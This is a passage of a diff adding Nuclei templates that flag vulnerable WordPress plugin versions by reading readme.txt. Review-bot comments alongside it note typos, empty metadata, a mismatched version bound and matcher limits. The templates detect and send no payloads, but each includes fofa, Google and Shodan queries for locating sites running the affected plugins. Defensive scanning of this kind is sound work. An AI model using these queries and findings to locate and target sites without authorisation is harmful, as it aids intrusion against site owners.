+ - "rest-api-to-miniprogram"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.7.1')
\ No newline at end of file
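Review bot: The `description` text has two typos that end up in scan reports: `takeovr` and `which can the be leveraged`. They should read `takeover` and `which can then be leveraged`. If the text is copied verbatim from the upstream feed, fixing it in the generator keeps it from returning on the next sync.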
diff --git a/poc/cve/CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362.yaml b/poc/cve/CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362.yaml
new file mode 100644
index 0000000000..9ceebf2dc2
--- /dev/null
+++ b/poc/cve/CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9270-54f88c5ac9605569d0f73ca27f9f2362
+
+info:
+ name: >
+ Lenxel Core for Lenxel(LNX) LMS <= 1.2.3 - Authenticated (Author+) Stored Cross-Site Scripting via SVG File Upload
+ author: topscoder
+ severity: low
+ description: >
+ The Lenxel Core for Lenxel(LNX) LMS plugin for WordPress is vulnerable to Stored Cross-Site Scripting via SVG File uploads in all versions up to, and including, 1.2.3 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses the SVG file.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2e1d1283-3bd9-458e-81ca-9934b293415a?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 6.4
+ cve-id: CVE-2024-9270
+ metadata:
+ fofa-query: "wp-content/plugins/lenxel-core/"
+ google-query: inurl:"/wp-content/plugins/lenxel-core/"
+ shodan-query: 'vuln:CVE-2024-9270'
+ tags: cve,wordpress,wp-plugin,lenxel-core,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/lenxel-core/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "lenxel-core"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.2.3')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml b/poc/cve/CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml
new file mode 100644
index 0000000000..5bbd1df967
--- /dev/null
+++ b/poc/cve/CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9705-47f72a4a6e0c73ca568cee56cbebba9e
+
+info:
+ name: >
+ Ultimate Coming Soon & Maintenance <= 1.0.9 - Missing Authorization to Authenticated (Subscriber+) Template Name Update
+ author: topscoder
+ severity: low
+ description: >
+ The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the 'ucsm_update_template_name_lite' function in all versions up to, and including, 1.0.9. This makes it possible for authenticated attackers, with Subscriber-level access and above, to change the name of the plugin's templates.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/3bef108a-2c68-4347-bf53-559b2d877f6b?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 4.3
+ cve-id: CVE-2024-9705
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-coming-soon/"
+ google-query: inurl:"/wp-content/plugins/ultimate-coming-soon/"
+ shodan-query: 'vuln:CVE-2024-9705'
+ tags: cve,wordpress,wp-plugin,ultimate-coming-soon,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-coming-soon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-coming-soon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml b/poc/cve/CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml
new file mode 100644
index 0000000000..9642f637d8
--- /dev/null
+++ b/poc/cve/CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9706-c93a0ea327575103c1bd40e9f8d3b76b
+
+info:
+ name: >
+ Ultimate Coming Soon & Maintenance <= 1.0.9 - Missing Authorization to Unauthenticated Template Activation
+ author: topscoder
+ severity: high
+ description: >
+ The Ultimate Coming Soon & Maintenance plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the ucsm_activate_lite_template_lite function in all versions up to, and including, 1.0.9. This makes it possible for unauthenticated attackers to change the template used for the coming soon / maintenance page.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/a535eb7f-5ec7-4b3b-b46f-4f09434d04b6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N
+ cvss-score: 5.3
+ cve-id: CVE-2024-9706
+ metadata:
+ fofa-query: "wp-content/plugins/ultimate-coming-soon/"
+ google-query: inurl:"/wp-content/plugins/ultimate-coming-soon/"
+ shodan-query: 'vuln:CVE-2024-9706'
+ tags: cve,wordpress,wp-plugin,ultimate-coming-soon,high
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ultimate-coming-soon/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ultimate-coming-soon"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.9')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml b/poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml
new file mode 100644
index 0000000000..1279dad8af
--- /dev/null
+++ b/poc/cve/CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9769-04f41ad5af8b4a40298696fa6f430b08
+
+info:
+ name: >
+ Video Gallery <= 2.4.1 - Authenticated (Administrator+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Video Gallery – Best WordPress YouTube Gallery plugin for WordPress is vulnerable to Stored Cross-Site Scripting via admin settings in all versions up to, and including, 2.4.1 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with administrator-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/b57c9e58-64a6-48e8-8ef6-25608e4131e6?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N
+ cvss-score: 4.4
+ cve-id: CVE-2024-9769
+ metadata:
+ fofa-query: "wp-content/plugins/gallery-videos/"
+ google-query: inurl:"/wp-content/plugins/gallery-videos/"
+ shodan-query: 'vuln:CVE-2024-9769'
+ tags: cve,wordpress,wp-plugin,gallery-videos,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/gallery-videos/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "gallery-videos"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.1')
\ No newline at end of file
diff --git a/poc/cve/CVE-2024-9866-7390d9a349370910408c5562d135bc89.yaml b/poc/cve/CVE-2024-9866-7390d9a349370910408c5562d135bc89.yaml
new file mode 100644
index 0000000000..712b5b3a8a
--- /dev/null
+++ b/poc/cve/CVE-2024-9866-7390d9a349370910408c5562d135bc89.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9866-7390d9a349370910408c5562d135bc89
+
+info:
+ name: >
+ Event Tickets with Ticket Scanner <= 2.4.4 - Missing Authorization to Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Event Tickets with Ticket Scanner plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'data' parameters in all versions up to, and including, 2.4.4 due to insufficient input sanitization and output escaping and missing authorization on the functionality to manage tickets. This makes it possible for authenticated attackers, with subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This missing authorization aspect of this was patched in 2.4.1, while the Cross-Site Scripting was fully patched in 2.4.4.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/4dcf1133-d437-4f0a-b2cf-c91e0f6b6ca9?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-9866
+ metadata:
+ fofa-query: "wp-content/plugins/event-tickets-with-ticket-scanner/"
+ google-query: inurl:"/wp-content/plugins/event-tickets-with-ticket-scanner/"
+ shodan-query: 'vuln:CVE-2024-9866'
+ tags: cve,wordpress,wp-plugin,event-tickets-with-ticket-scanner,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/event-tickets-with-ticket-scanner/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "event-tickets-with-ticket-scanner"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 2.4.3')
\ No newline at end of file
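Review bot: The version bound in the `dsl` matcher, `compare_versions(version, '<= 2.4.3')`, disagrees with the `name` and the `description`, which both say versions up to and including 2.4.4 are affected. The description also says the XSS was fully patched in 2.4.4, so one of the two is wrong: either the matcher misses 2.4.4 installs or the title overstates the range. Whichever the advisory confirms, name, description and matcher should carry the same bound, with a short comment beside the dsl line recording the fixed release.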
diff --git a/poc/cve/CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7.yaml b/poc/cve/CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7.yaml
new file mode 100644
index 0000000000..f518e3494f
--- /dev/null
+++ b/poc/cve/CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7.yaml
@@ -0,0 +1,59 @@
+id: CVE-2024-9872-0a2b107a70a05e6330557fd04ebc29f7
+
+info:
+ name: >
+ Online Booking & Scheduling Calendar for WordPress by vcita <= 4.5.1 - Authenticated (Subscriber+) Stored Cross-Site Scripting
+ author: topscoder
+ severity: low
+ description: >
+ The Online Booking & Scheduling Calendar for WordPress by vcita plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the vcita_save_user_data_callback() function in all versions up to, and including, 4.5.1. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject malicious web scripts and update settings.
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/963c2d10-692b-4447-8d0b-7ccc2e533f01?source=api-prod
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 5.4
+ cve-id: CVE-2024-9872
+ metadata:
+ fofa-query: "wp-content/plugins/meeting-scheduler-by-vcita/"
+ google-query: inurl:"/wp-content/plugins/meeting-scheduler-by-vcita/"
+ shodan-query: 'vuln:CVE-2024-9872'
+ tags: cve,wordpress,wp-plugin,meeting-scheduler-by-vcita,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/meeting-scheduler-by-vcita/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "meeting-scheduler-by-vcita"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 4.5.1')
\ No newline at end of file
diff --git a/poc/header/simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d.yaml b/poc/header/simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d.yaml
new file mode 100644
index 0000000000..b5901f44a8
--- /dev/null
+++ b/poc/header/simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d.yaml
@@ -0,0 +1,59 @@
+id: simple-header-and-footer-2f2d13d68d1aa9ea670e89d2619faa2d
+
+info:
+ name: >
+ Simple Header and Footer <= 1.0.0 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/5b253378-beba-4e31-bf1f-0352fdf98ab5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/simple-header-and-footer/"
+ google-query: inurl:"/wp-content/plugins/simple-header-and-footer/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,simple-header-and-footer,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/simple-header-and-footer/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "simple-header-and-footer"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.0')
\ No newline at end of file
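Review bot: The `info` block ships with its generated fields unfilled: `description: >` is blank, `cvss-metrics`, `cvss-score` and `cve-id` parse as null, and `shodan-query: 'vuln:'` has nothing after the prefix, while `tags` still carries `cve`. Anyone filtering on the `cve` tag or sorting by CVSS gets this template with no identifier or score behind it. I would drop the empty `classification` keys and the `shodan-query` line, remove `cve` from `tags` until an ID is assigned, and fill `description` from the Wordfence advisory already linked under `reference`. The same placeholders appear in every other topscoder template added in this part of the diff, from cluevo-lms through essential-breadcrumbs.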
diff --git a/poc/microsoft/cluevo-lms-ba6446ba5ad9a5f47c413928535e804a.yaml b/poc/microsoft/cluevo-lms-ba6446ba5ad9a5f47c413928535e804a.yaml
new file mode 100644
index 0000000000..dacca35397
--- /dev/null
+++ b/poc/microsoft/cluevo-lms-ba6446ba5ad9a5f47c413928535e804a.yaml
@@ -0,0 +1,59 @@
+id: cluevo-lms-ba6446ba5ad9a5f47c413928535e804a
+
+info:
+ name: >
+ CLUEVO LMS, E-Learning Platform <= 1.13.2 - Cross-Site Request Forgery to Module Deletion
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/2a3056d4-5ee9-4b31-9ef8-0e55f470ad23?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/cluevo-lms/"
+ google-query: inurl:"/wp-content/plugins/cluevo-lms/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,cluevo-lms,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/cluevo-lms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "cluevo-lms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.13.2')
\ No newline at end of file
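Review bot: This template is added under `poc/microsoft/`, but everything in it targets a WordPress plugin (`wp-content/plugins/cluevo-lms/`, tags `wordpress,wp-plugin`); the pojo-forms file in the next hunk has the same placement. A run scoped by directory to Microsoft products would send these readme probes to hosts where they cannot apply, and a WordPress-scoped run would miss them. Sibling WordPress templates in this commit land in `poc/other/`, so moving both there (or to whatever WordPress category the repository uses) would keep directory-based selection meaningful.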
diff --git a/poc/microsoft/pojo-forms-889210e907a32f3bac90ac14ce08d937.yaml b/poc/microsoft/pojo-forms-889210e907a32f3bac90ac14ce08d937.yaml
new file mode 100644
index 0000000000..27102fd203
--- /dev/null
+++ b/poc/microsoft/pojo-forms-889210e907a32f3bac90ac14ce08d937.yaml
@@ -0,0 +1,59 @@
+id: pojo-forms-889210e907a32f3bac90ac14ce08d937
+
+info:
+ name: >
+ Pojo Forms <= 1.4.7 - Authenticated (Subscriber+) Arbitrary Shortcode Execution via form_preview_shortcode
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/511ce6f6-aea3-4c37-8312-d6e5ff2fdf6f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/pojo-forms/"
+ google-query: inurl:"/wp-content/plugins/pojo-forms/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,pojo-forms,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/pojo-forms/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "pojo-forms"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.4.7')
\ No newline at end of file
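Review bot: The only evidence behind a match is the `Stable tag` line of readme.txt compared with `'<= 1.4.7'`, so a hit means "version string at or below the affected release", not that the shortcode issue was confirmed; the `name` itself says the flaw needs an authenticated Subscriber. I would state that in the template, for example with a comment above the `dsl` matcher: `# version fingerprint only - confirm the installed version before triage`. The regex `([0-9.]+)` also captures nothing when a readme declares `Stable tag: trunk`, so such installs are silently skipped rather than reported as unknown. Both limits apply to every readme-based template in this commit.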
diff --git a/poc/open_redirect/eelv-redirection.yaml b/poc/open_redirect/eelv-redirection.yaml
new file mode 100644
index 0000000000..ba640f569d
--- /dev/null
+++ b/poc/open_redirect/eelv-redirection.yaml
@@ -0,0 +1,59 @@
+id: eelv-redirection
+
+info:
+ name: >
+ Simple Redirection <= 1.5 - Cross-Site Request Forgery to Arbitrary Site Redirect
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/0fa84344-8672-43e1-a430-094021f7366f?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/eelv-redirection/"
+ google-query: inurl:"/wp-content/plugins/eelv-redirection/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,eelv-redirection,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/eelv-redirection/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "eelv-redirection"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.5')
\ No newline at end of file
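Review bot: The `word` matcher requires the slug `eelv-redirection` in the readme body, yet the plugin's display name is "Simple Redirection", so the template cannot count on the slug occurring in readme.txt at all; with `matchers-condition: and`, a readme that never mentions it turns the template into a silent no-op. The request path already pins the plugin directory and the `dsl` matcher already needs a parsed `Stable tag`, so the word check adds no specificity. I would match on text every plugin readme carries instead, for example `- "Stable tag:"`, or drop the matcher. The cosmosfarm-share-buttons hunk further down, whose display name is not in Latin script, looks exposed to the same miss.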
diff --git a/poc/other/advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a.yaml b/poc/other/advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a.yaml
new file mode 100644
index 0000000000..b3d988e062
--- /dev/null
+++ b/poc/other/advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a.yaml
@@ -0,0 +1,59 @@
+id: advanced-what-should-we-write-about-next-f83be05ea88f2f446101c8a2b115a53a
+
+info:
+ name: >
+ Advanced What should we write next about <= 1.0.3 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/9b09f4de-f67d-4d15-a3e3-0cc78cfe7fe8?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/advanced-what-should-we-write-about-next/"
+ google-query: inurl:"/wp-content/plugins/advanced-what-should-we-write-about-next/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,advanced-what-should-we-write-about-next,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/advanced-what-should-we-write-about-next/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "advanced-what-should-we-write-about-next"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.0.3')
\ No newline at end of file
diff --git a/poc/other/ai-quiz-31f0fc808945baa02a83ad64def460f0.yaml b/poc/other/ai-quiz-31f0fc808945baa02a83ad64def460f0.yaml
new file mode 100644
index 0000000000..5f9e3b9885
--- /dev/null
+++ b/poc/other/ai-quiz-31f0fc808945baa02a83ad64def460f0.yaml
@@ -0,0 +1,59 @@
+id: ai-quiz-31f0fc808945baa02a83ad64def460f0
+
+info:
+ name: >
+ AI Quiz | Quiz Maker <= 1.1 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Options Update
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/53591a3b-8a99-40e2-8145-1d7785bcbab4?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/ai-quiz/"
+ google-query: inurl:"/wp-content/plugins/ai-quiz/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,ai-quiz,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/ai-quiz/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "ai-quiz"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.1')
\ No newline at end of file
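Review bot: The two `version` extractors are identical apart from `internal: true`, and nothing in the file says why both are there. As far as I know the internal one is what makes `version` visible to the `dsl` matcher, while the second only prints the value in the result. A short comment on each would stop someone deleting one as a duplicate: `# internal: feeds compare_versions() below` and `# reported in scan output`. The pattern repeats in every readme-based template in this commit.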
diff --git a/poc/other/arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9.yaml b/poc/other/arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9.yaml
new file mode 100644
index 0000000000..e92e50e2e5
--- /dev/null
+++ b/poc/other/arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9.yaml
@@ -0,0 +1,59 @@
+id: arca-payment-gateway-348f645a41831338e3ad29ac7c3259b9
+
+info:
+ name: >
+ ArCa Payment Gateway <= 1.3.1 - Cross-Site Request Forgery to Stored Cross-Site Scripting
+ author: topscoder
+ severity: medium
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/6ec069ef-7b53-47b5-93bc-92cfc2d62c88?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/arca-payment-gateway/"
+ google-query: inurl:"/wp-content/plugins/arca-payment-gateway/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,arca-payment-gateway,medium
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/arca-payment-gateway/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ regex:
+ - "(?mi)Stable tag: ([0-9.]+)"
+
+ matchers-condition: and
+ matchers:
+ - type: status
+ status:
+ - 200
+
+ - type: word
+ words:
+ - "arca-payment-gateway"
+ part: body
+
+ - type: dsl
+ dsl:
+ - compare_versions(version, '<= 1.3.1')
\ No newline at end of file
diff --git a/poc/other/armember-membership-f395947e480c6bd2b9668c739bc544ea.yaml b/poc/other/armember-membership-f395947e480c6bd2b9668c739bc544ea.yaml
new file mode 100644
index 0000000000..a0ca7c62c2
--- /dev/null
+++ b/poc/other/armember-membership-f395947e480c6bd2b9668c739bc544ea.yaml
@@ -0,0 +1,59 @@
+id: armember-membership-f395947e480c6bd2b9668c739bc544ea
+
+info:
+ name: >
+ ARMember – Membership Plugin, Content Restriction, Member Levels, User Profile & User signup <= 4.0.51 - Authenticated (Subscriber+) Arbitrary Shortcode Execution
+ author: topscoder
+ severity: low
+ description: >
+
+ reference:
+ - https://github.com/topscoder/nuclei-wordfence-cve
+ - https://www.wordfence.com/threat-intel/vulnerabilities/id/ee0eead2-3eab-4a2a-bfe4-c0d8f91dc0a5?source=api-scan
+ classification:
+ cvss-metrics:
+ cvss-score:
+ cve-id:
+ metadata:
+ fofa-query: "wp-content/plugins/armember-membership/"
+ google-query: inurl:"/wp-content/plugins/armember-membership/"
+ shodan-query: 'vuln:'
+ tags: cve,wordpress,wp-plugin,armember-membership,low
+
+http:
+ - method: GET
+ redirects: true
+ max-redirects: 3
+ path:
+ - "{{BaseURL}}/wp-content/plugins/armember-membership/readme.txt"
+
+ extractors:
+ - type: regex
+ name: version
+ part: body
+ group: 1
+ internal: true
+ regex:
